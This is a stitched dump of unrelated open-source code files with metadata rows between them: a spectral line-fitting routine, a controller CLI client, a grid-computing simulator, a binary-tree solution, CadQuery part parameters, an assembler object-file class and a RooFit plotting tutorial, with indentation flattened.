dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
d_out=[]
for kk in range(10):
fluxRR = interp1d(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection])
flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum])
d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
#print "jk out", d_out
err_out = n.std(d_out,axis=0)
#print "before", err_out, dat_mean
# assign error values :
dat_mean[3] = err_out[3-1]
dat_mean[5] = err_out[5-1]
dat_mean[7] = err_out[7-1]
#print "after", dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
# measure line properties from the mean weighted stack
print li[2]
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
d_out=[]
for kk in range(len(self.hdu1.data['jackknifeSpectra'].T)):
fluxRR = interp1d(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection])
flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum])
d1,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
err_out = n.std(d_out,axis=0)
# assign error values :
dat_mean[2] = err_out[2-1]
dat_mean[4] = err_out[4-1]
dat_mean[6] = err_out[6-1]
data.append(dat_mean)
h.append(hI)
heading="".join(h)
out=n.hstack((data))
#print "out", out
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.lineSpec_cols = fits.ColDefs([col0, col1])
#print self.lineSpec_cols
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
#print self.lineSpec_cols
self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols)
def fit_lines_to_fullSpectrum(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to full spectrum"
lfit = lineFit.LineFittingLibrary()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
d_out=[]
for kk in range(10):
d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection], self.flErr , a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
#print "jk out", d_out
err_out = n.std(d_out,axis=0)
#print "before", err_out, dat_mean
# assign error values :
dat_mean[3] = err_out[3-1]
dat_mean[5] = err_out[5-1]
dat_mean[7] = err_out[7-1]
#print "after", dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
print li[2]
# measure line properties from the mean weighted stack
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
d_out=[]
for kk in range(len(self.hdu1.data['jackknifeSpectra'].T)):
d1,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection], self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
err_out = n.std(d_out,axis=0)
# assign error values :
dat_mean[2] = err_out[2-1]
dat_mean[4] = err_out[4-1]
dat_mean[6] = err_out[6-1]
data.append(dat_mean)
#print li[2], dat_mean
h.append(hI)
heading="".join(h)
out=n.hstack((data))
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.fullSpec_cols = fits.ColDefs([col0, col1])
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols)
def fit_lines_to_lineSpectrum_tutorial(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to the line spectrum"
lfit = lineFit.LineFittingLibrary()
#self.subtract_continuum_model()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
# measure line properties from the mean weighted stack
print li[2]
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
data.append(dat_mean)
h.append(hI)
heading="".join(h)
out=n.hstack((data))
#print "out", out
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.lineSpec_cols = fits.ColDefs([col0, col1])
#print self.lineSpec_cols
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
#print self.lineSpec_cols
self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols)
def fit_lines_to_fullSpectrum_tutorial(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to full spectrum"
lfit = lineFit.LineFittingLibrary()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
print li[2]
# measure line properties from the mean weighted stack
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
data.append(dat_mean)
#print li[2], dat_mean
h.append(hI)
heading="".join(h)
out=n.hstack((data))
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.fullSpec_cols = fits.ColDefs([col0, col1])
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols)
def save_spectrum(self):
"""
Saves the stack spectrum, the model and derived quantities in a single fits file with different hdus.
"""
wavelength = fits.Column(name="wavelength",format="D", unit="Angstrom", array= self.wlLineSpectrum)
flux = fits.Column(name="flux",format="D", unit="Angstrom", array= self.flLineSpectrum)
fluxErr = fits.Column(name="fluxErr",format="D", unit="Angstrom", array= self.flErrLineSpectrum)
# new columns
cols = fits.ColDefs([wavelength, flux, fluxErr])
lineSptbhdu = fits.BinTableHDU.from_columns(cols)
# previous file
prihdu = fits.PrimaryHDU(header=self.hdR)
thdulist = fits.HDUList([prihdu, self.hdu1, self.hdu2, lineSptbhdu, self.lineSpec_tb_hdu, self.fullSpec_tb_hdu])
outPutFileName = self.stack_model_file
outFile = n.core.defchararray.replace(outPutFileName, "fits", "model").item()
if self.tutorial:
outFile = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base[:-5]+".model" )
if self.eboss_stack:
#outFile = join(os.environ['DATA_DIR'],"ELG-composite", "stacks", "model", self.stack_file_base[:-6] + ".model.fits")
outFile = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "model", self.stack_file_base[:-6] + ".model")
if os.path.isfile(outFile):
os.remove(outFile)
thdulist.writeto(outFile)
| cc0-1.0 | 5,811,073,617,534,907,000 | 43.384615 | 316 | 0.68462 | false | 2.521627 | false | false | false |
motoz/nbetest | client.py | 1 | 3133 | #! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Anders Nylund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import print_function
from argparse import ArgumentParser
from protocol import Proxy
PORT = 8483 # Controller port
PASSWORD = '0123456789'
def getfunc(args, proxy):
l = proxy.get(args.path)
print('\n'.join(l))
def setfunc(args, proxy):
l = proxy.set(args.path, args.value)
print('\n'.join(l))
def rawfunc(args, proxy):
response = proxy.make_request(int(args.function), args.payload)
if args.verbose:
print('response from:', proxy.addr)
print('IP:', proxy.ip, 'Serial', proxy.serial)
print('received: ' + (response.framedata[1:-1]).decode('ascii'))
print(' status: %d'%response.status)
print(' function: %d'%response.function)
print(' payload:\n ' + '\n '.join(response.payload.split(';')))
else:
print('\n'.join(response.payload.split(';')))
if __name__ == '__main__':
argparser = ArgumentParser()
argparser.add_argument('-v', '--verbose', action='store_true')
argparser.add_argument('-a', '--address', default=None, help='controller address, autodiscovered if omitted')
argparser.add_argument('-p', '--password', default=PASSWORD)
argparser.add_argument('-s', '--serial', default='000000')
subparsers = argparser.add_subparsers(help='sub-command help')
# create the parser for the "raw" command
parser_b = subparsers.add_parser('raw', help='')
parser_b.add_argument('function', help='')
parser_b.add_argument('payload', help='')
parser_b.set_defaults(func=rawfunc)
# create the parser for the "set" command
parser_b = subparsers.add_parser('set', help='write item value')
parser_b.add_argument('path', nargs='?', default = '*', help='path to write')
parser_b.add_argument('value', nargs='?', help='value to write')
parser_b.set_defaults(func=setfunc)
# create the parser for the "get" command
parser_c = subparsers.add_parser('get', help='get all items')
parser_c.add_argument('path', nargs='?', default = '*', help='partial of full path to item')
parser_c.set_defaults(func=getfunc)
args = argparser.parse_args()
if args.address is None:
with Proxy.discover(args.password, PORT, args.serial) as proxy:
args.func(args, proxy)
else:
with Proxy(args.password, PORT, args.address, args.serial) as proxy:
args.func(args, proxy)
| gpl-2.0 | 1,483,653,078,911,860,000 | 35.430233 | 113 | 0.658474 | false | 3.774699 | false | false | false |
auxten/pymw | pymw/interfaces/grid_simulator.py | 2 | 8122 | #!/usr/bin/env python
"""Provide a interface for simulating master worker computing on a desktop grid based on traces.
Thanks to Derrick Kondo for the idea.
"""
__author__ = "Eric Heien <pymw@heien.org>"
__date__ = "2 May 2009"
import errno
import heapq
import array
# TODO: have some sort of wraparound for worker availability intervals,
# or cleanly error out for workers that are no longer available
class SimWorker:
def __init__(self, worker_name, worker_speed, worker_avail_lens, worker_avail_fracs):
self._name = worker_name
self._speed = worker_speed
self._avail_lens = array.ArrayType('f')
self._avail_fracs = array.ArrayType('f')
self._avail_lens.fromlist(worker_avail_lens)
self._avail_fracs.fromlist(worker_avail_fracs)
self._avail_ind = 0
self._cur_time = 0
self._sub_avail_time = 0
self._task_wall_times = []
self._task_cpu_times = []
# TODO: handle going out of bounds on avail array
# Simulates the worker performing cpu_secs
# Returns the actual wall time to complete this
def run_cpu(self, cpu_secs):
self._task_cpu_times.append(cpu_secs)
wall_exec_time = 0
while cpu_secs > 0:
# Calculate the speed of this worker during the interval
worker_int_speed = self._avail_fracs[self._avail_ind] * self._speed
# Determine the remaining length of this interval
int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time
# Determine the available CPU seconds in this interval
int_cpu_secs = int_remaining_secs * worker_int_speed
# If we won't finish the task in this interval
if int_cpu_secs < cpu_secs:
# Move to the next interval
wall_exec_time += int_remaining_secs
self._avail_ind += 1
self._sub_avail_time = 0
cpu_secs -= int_cpu_secs
else:
# Move to the middle of this interval
executed_secs = cpu_secs/worker_int_speed
wall_exec_time += executed_secs
self._sub_avail_time += executed_secs
cpu_secs = 0
self._cur_time += wall_exec_time
self._task_wall_times.append(wall_exec_time)
# Advances the wall time of this worker by wall_secs
# If the worker is not available at the new time,
# advances the wall time further until the worker is available
def advance_wall_time(self, wall_secs):
rem_secs = wall_secs
# Advance the availablity interval pointer until we've passed wall_secs
while rem_secs > 0:
int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time
if int_remaining_secs < rem_secs:
rem_secs -= int_remaining_secs
self._sub_avail_time = 0
self._avail_ind += 1
else:
self._sub_avail_time += rem_secs
rem_secs = 0
# Advance until we're in an available state
additional_secs = 0
while self._avail_fracs[self._avail_ind] == 0:
additional_secs += self._avail_lens[self._avail_ind] - self._sub_avail_time
self._avail_ind += 1
self._sub_avail_time = 0
# Advance the current simulation time
self._cur_time += wall_secs + additional_secs
# Test if this worker is available at sim_time
def past_sim_time(self, sim_time):
if sim_time >= self._cur_time: return True
else: return False
def __str__(self):
return self._name
def __repr__(self):
return self._name
def __cmp__(self, other):
return self._cur_time - other._cur_time
class GridSimulatorInterface:
def __init__(self, trace_files=[]):
self._cur_sim_time = 0
self._num_executed_tasks = 0
self._worker_list = []
self._waiting_list = []
def add_worker(self, worker):
# Advance the new worker to its first available time
worker.advance_wall_time(0)
# If the new worker isn't available at the start, put it on the waiting list
if not worker.past_sim_time(0):
self._worker_list.append(worker)
else:
heapq.heappush(self._waiting_list, worker)
def generate_workers(self, num_workers, speed_func, avail_func):
for wnum in range(num_workers):
new_worker_speed = speed_func(wnum)
new_worker_avail_lens, new_worker_avail_fracs = avail_func(wnum)
new_worker = SimWorker("W"+str(wnum), new_worker_speed, new_worker_avail_lens, new_worker_avail_fracs)
self.add_worker(new_worker)
def read_workers_from_fta_tab_files(self, event_trace_file, num_workers=None):
if event_trace_file:
worker_dict = {}
event_trace_file.readline() # skip the header line
for line in event_trace_file:
split_line = line.split()
node_id, start_time, stop_time = split_line[2], float(split_line[6]), float(split_line[7])
if node_id not in worker_dict:
if num_workers and len(worker_dict) >= num_workers: break
else: worker_dict[node_id] = []
worker_dict[node_id].append([start_time, stop_time])
for worker_id in worker_dict:
avail_lens = []
avail_fracs = []
worker_times = worker_dict[worker_id]
last_interval_end = 0
for int_time in worker_times:
interval_length = int_time[0] - start_time
start_time = int_time[1]
#print((worker_id, worker_times))
# If none of the workers matched the available tasks and there are still workers in the wait queue,
# advance simulation time and tell PyMW to try again
def try_avail_check_again(self):
if len(self._waiting_list) == 0:
return False
self._cur_sim_time = self._waiting_list[0]._cur_time
return True
def get_available_workers(self):
# Pop workers off the sorted waiting list until cur_sim_time
while len(self._waiting_list) > 0 and self._waiting_list[0].past_sim_time(self._cur_sim_time):
self._worker_list.append(heapq.heappop(self._waiting_list))
return self._worker_list
def reserve_worker(self, worker):
self._worker_list.remove(worker)
def worker_finished(self, worker):
heapq.heappush(self._waiting_list, worker)
def execute_task(self, task, worker):
if not worker:
raise Exception("Cannot use NULL worker")
# Get the CPU seconds for the specified task and worker
task_exec_time = task._raw_exec(worker)
# Run the worker for task_exec_time CPU seconds
worker.run_cpu(task_exec_time)
self._num_executed_tasks += 1
task.task_finished(None) # notify the task
# Compute statistics (mean, median, stddev) on values in the array
def compute_stats(self, times):
times.sort()
total_time = 0
for x in times: total_time += x
mean_time = total_time / len(times)
median_time = times[len(times)/2]
stddev_time = 0
for time_n in times:
stddev_time += pow(mean_time - time_n, 2)
stddev_time = pow(stddev_time/len(times), 0.5)
return total_time, mean_time, median_time, stddev_time
def get_status(self):
wall_times = []
cpu_times = []
for worker in self._worker_list:
wall_times.extend(worker._task_wall_times)
cpu_times.extend(worker._task_cpu_times)
for worker in self._waiting_list:
wall_times.extend(worker._task_wall_times)
cpu_times.extend(worker._task_cpu_times)
if len(wall_times) > 0:
total_wall_time, mean_wall_time, median_wall_time, stddev_wall_time = self.compute_stats(wall_times)
total_cpu_time, mean_cpu_time, median_cpu_time, stddev_cpu_time = self.compute_stats(cpu_times)
else:
total_wall_time = mean_wall_time = median_wall_time = stddev_wall_time = 0
total_cpu_time = mean_cpu_time = median_cpu_time = stddev_cpu_time = 0
worker_sim_times = [worker._cur_time for worker in self._worker_list]
worker_sim_times.append(0)
cur_sim_time = max(worker_sim_times)
num_workers = len(self._worker_list) + len(self._waiting_list)
return {"num_total_workers" : num_workers, "num_executed_tasks" : self._num_executed_tasks,
"cur_sim_time": cur_sim_time,
"total_wall_time": total_wall_time, "mean_wall_time": mean_wall_time,
"median_wall_time": median_wall_time, "stddev_wall_time": stddev_wall_time,
"total_cpu_time": total_cpu_time, "mean_cpu_time": mean_cpu_time,
"median_cpu_time": median_cpu_time, "stddev_cpu_time": stddev_cpu_time,
}
def pymw_master_read(self, loc):
return None, None, None
def pymw_master_write(self, output, loc):
return None
def pymw_worker_read(loc):
return None
def pymw_worker_write(output, loc):
return None
def pymw_worker_func(func_name_to_call):
return None
| mit | -6,526,020,610,318,547,000 | 33.709402 | 105 | 0.691455 | false | 3.008148 | false | false | false |
weixsong/algorithm | leetcode/199.py | 1 | 1052 | # -*- encoding: utf-8 -*-
'''
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
For example:
Given the following binary tree,
1 <---
/ \
2 3 <---
\ \
5 4 <---
You should return [1, 3, 4].
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def rightSideView(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
if root == None:
return []
res = []
q = [root]
while len(q) != 0:
res.append(q[len(q) - 1].val)
temp = []
for item in q:
if item.left != None:
temp.append(item.left)
if item.right != None:
temp.append(item.right)
q = temp
return res
| mit | 819,643,236,911,964,000 | 21.869565 | 142 | 0.469582 | false | 3.757143 | false | false | false |
easyw/kicad-3d-models-in-freecad | cadquery/FCAD_script_generator/Conn_PinSocket/cq_base_parameters.py | 4 | 8672 | # -*- coding: utf8 -*-
#!/usr/bin/python
#
#****************************************************************************
#* *
#* base classes for generating part models in STEP AP214 *
#* *
#* This is part of FreeCAD & cadquery tools *
#* to export generated models in STEP & VRML format. *
#* Copyright (c) 2017 *
#* Terje Io https://github.com/terjeio *
#* Maurice https://launchpad.net/~easyw *
#* *
#* All trademarks within this guide belong to their legitimate owners. *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., *
#* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA *
#* *
#****************************************************************************
# 2017-11-25
#
# parts of this code is based on work by other contributors
#
from collections import namedtuple
### use enums (Phyton 3+)
class CaseType:
r"""A class for holding constants for part types
.. note:: will be changed to enum when Python version allows it
"""
THT = 'THT'
r"""THT - trough hole part
"""
SMD = 'SMD'
r"""SMD - surface mounted part
"""
class PinStyle:
r"""A class for holding constants for pin styles
.. note:: will be changed to enum when Python version allows it
"""
STRAIGHT = 'Straight'
ANGLED = 'Angled'
###
#
# The following classes must be subclassed
#
class PartParametersBase:
"""
.. document private functions
.. automethod:: _make_params
"""
Model = namedtuple("Model", [
'variant', # generic model name
'params', # parameters
'model' # model creator class
])
""" Internally used for passing information from the base parameters to the class instance used for creating models
.. py:attribute:: variant
The generic name from the list of parameters
.. py:attribute:: params
The final parameters passed to the class instance
.. py:attribute:: model
The class instance itself
"""
Params = namedtuple("Params", [
'num_pins',
'pin_pitch',
'pin_style',
'type'
])
""" Basic parameters for parts, if further parameters are required this should be subclassed/overriden
.. note:: The existing parameters should be kept with the same name when overriden as the framework requires them
.. py:attribute:: num_pins
Number of pins, for parts with this is usually set to None for
.. py:attribute:: pin_pitch
The final parameters passed to the class instance
.. py:attribute:: pin_style
The class instance itself
.. py:attribute:: type
The class instance itself
"""
def __init__(self):
self.base_params = {}
def _make_params(self, pin_pitch, num_pin_rows, pin_style, type):
r"""add a list of new points
"""
return self.Params(
num_pins = None, # to be added programmatically
pin_pitch = pin_pitch, # pin pitch
pin_style = pin_style, # pin style: 'Straight' or 'Angled'
type = type # part type: 'THT' or 'SMD'
)
def getAllModels(self, model_classes):
r"""Generate model parameters for all series and variants
Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classes:
list of part creator classes inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
models = {}
# instantiate generator classes in order to make a dictionary of all model names
for i in range(0, len(model_classes)):
for variant in self.base_params.keys():
params = self.base_params[variant]
model = model_classes[i](params)
if model.make_me:
models[model.makeModelName(variant)] = self.Model(variant, params, model_classes[i])
return models
def getSampleModels(self, model_classes):
r"""Generate model parameters for all series and variants
Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classes:
list of part creator classes inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
models = {}
# instantiate generator classes in order to make a dictionary of all default variants
for i in range(0, len(model_classes)):
variant = model_classes[i].default_model
params = self.base_params[variant]
model = model_classes[i](params)
if model.make_me:
models[model.makeModelName(variant)] = self. Model(variant, params, model_classes[i])
return models
def getModel(self, model_class, variant):
r"""Generate model parameters for all series and variants
Gets the parameters for a single variant.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classe:
part creator class inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
model = self.base_params.has_key(variant)
# instantiate generator class in order to make a dictionary entry for a single variant
if model:
params = self.base_params[variant]
model = model_class(params)
if not model.make_me:
model = False
return model
### EOF ###
| gpl-2.0 | 6,652,362,685,478,027,000 | 37.542222 | 139 | 0.561232 | false | 4.863713 | false | false | false |
eliben/luz-cpu | luz_asm_sim/lib/asmlib/objectfile.py | 1 | 1466 | # Represents the object file recognized by the Luz architecture.
# An object file is relocatable. It is created by the assembler,
# and later combined with other object files by the linker into
# an executable.
#
# Luz micro-controller assembler
# Eli Bendersky (C) 2008-2010
#
class ObjectFile(object):
""" Use one of the factory methods to create ObjectFile
instances: from_assembler, from_file
The name of the object can be accessed via the .name
attribute.
"""
def __init__(self):
self.seg_data = {}
self.export_table = []
self.import_table = []
self.reloc_table = []
self.name = None
@classmethod
def from_assembler( cls,
seg_data,
export_table,
import_table,
reloc_table):
""" Create a new ObjectFile from assembler-generated data
structures.
"""
obj = cls()
assert isinstance(seg_data, dict)
for table in (export_table, import_table, reloc_table):
assert isinstance(table, list)
obj.seg_data = seg_data
obj.export_table = export_table
obj.import_table = import_table
obj.reloc_table = reloc_table
return obj
@classmethod
def from_file(cls, file):
""" 'file' is either a filename (a String), or a readable
IO object.
"""
pass
| unlicense | -8,877,308,944,578,829,000 | 28.32 | 65 | 0.572988 | false | 4.261628 | false | false | false |
karies/root | tutorials/roofit/rf205_compplot.py | 6 | 4552 | ## \file
## \ingroup tutorial_roofit
## \notebook
## Addition and convolution: options for plotting components of composite p.d.f.s.
##
## \macro_code
##
## \date February 2018
## \author Clemens Lange, Wouter Verkerke (C++ version)
import ROOT
# Set up composite pdf
# --------------------------------------
# Declare observable x
x = ROOT.RooRealVar("x", "x", 0, 10)
# Create two Gaussian PDFs g1(x,mean1,sigma) anf g2(x,mean2,sigma) and
# their parameters
mean = ROOT.RooRealVar("mean", "mean of gaussians", 5)
sigma1 = ROOT.RooRealVar("sigma1", "width of gaussians", 0.5)
sigma2 = ROOT.RooRealVar("sigma2", "width of gaussians", 1)
sig1 = ROOT.RooGaussian("sig1", "Signal component 1", x, mean, sigma1)
sig2 = ROOT.RooGaussian("sig2", "Signal component 2", x, mean, sigma2)
# Sum the signal components into a composite signal p.d.f.
sig1frac = ROOT.RooRealVar(
"sig1frac", "fraction of component 1 in signal", 0.8, 0., 1.)
sig = ROOT.RooAddPdf(
"sig", "Signal", ROOT.RooArgList(sig1, sig2), ROOT.RooArgList(sig1frac))
# Build Chebychev polynomial p.d.f.
a0 = ROOT.RooRealVar("a0", "a0", 0.5, 0., 1.)
a1 = ROOT.RooRealVar("a1", "a1", -0.2, 0., 1.)
bkg1 = ROOT.RooChebychev("bkg1", "Background 1",
x, ROOT.RooArgList(a0, a1))
# Build expontential pdf
alpha = ROOT.RooRealVar("alpha", "alpha", -1)
bkg2 = ROOT.RooExponential("bkg2", "Background 2", x, alpha)
# Sum the background components into a composite background p.d.f.
bkg1frac = ROOT.RooRealVar(
"sig1frac", "fraction of component 1 in background", 0.2, 0., 1.)
bkg = ROOT.RooAddPdf(
"bkg", "Signal", ROOT.RooArgList(bkg1, bkg2), ROOT.RooArgList(sig1frac))
# Sum the composite signal and background
bkgfrac = ROOT.RooRealVar("bkgfrac", "fraction of background", 0.5, 0., 1.)
model = ROOT.RooAddPdf(
"model", "g1+g2+a", ROOT.RooArgList(bkg, sig), ROOT.RooArgList(bkgfrac))
# Set up basic plot with data and full pdf
# ------------------------------------------------------------------------------
# Generate a data sample of 1000 events in x from model
data = model.generate(ROOT.RooArgSet(x), 1000)
# Plot data and complete PDF overlaid
xframe = x.frame(ROOT.RooFit.Title(
"Component plotting of pdf=(sig1+sig2)+(bkg1+bkg2)"))
data.plotOn(xframe)
model.plotOn(xframe)
# Clone xframe for use below
xframe2 = xframe.Clone("xframe2")
# Make component by object reference
# --------------------------------------------------------------------
# Plot single background component specified by object reference
ras_bkg = ROOT.RooArgSet(bkg)
model.plotOn(xframe, ROOT.RooFit.Components(
ras_bkg), ROOT.RooFit.LineColor(ROOT.kRed))
# Plot single background component specified by object reference
ras_bkg2 = ROOT.RooArgSet(bkg2)
model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg2), ROOT.RooFit.LineStyle(
ROOT.kDashed), ROOT.RooFit.LineColor(ROOT.kRed))
# Plot multiple background components specified by object reference
# Note that specified components may occur at any level in object tree
# (e.g bkg is component of 'model' and 'sig2' is component 'sig')
ras_bkg_sig2 = ROOT.RooArgSet(bkg, sig2)
model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg_sig2),
ROOT.RooFit.LineStyle(ROOT.kDotted))
# Make component by name/regexp
# ------------------------------------------------------------
# Plot single background component specified by name
model.plotOn(xframe2, ROOT.RooFit.Components(
"bkg"), ROOT.RooFit.LineColor(ROOT.kCyan))
# Plot multiple background components specified by name
model.plotOn(
xframe2,
ROOT.RooFit.Components("bkg1,sig2"),
ROOT.RooFit.LineStyle(
ROOT.kDotted),
ROOT.RooFit.LineColor(
ROOT.kCyan))
# Plot multiple background components specified by regular expression on
# name
model.plotOn(
xframe2,
ROOT.RooFit.Components("sig*"),
ROOT.RooFit.LineStyle(
ROOT.kDashed),
ROOT.RooFit.LineColor(
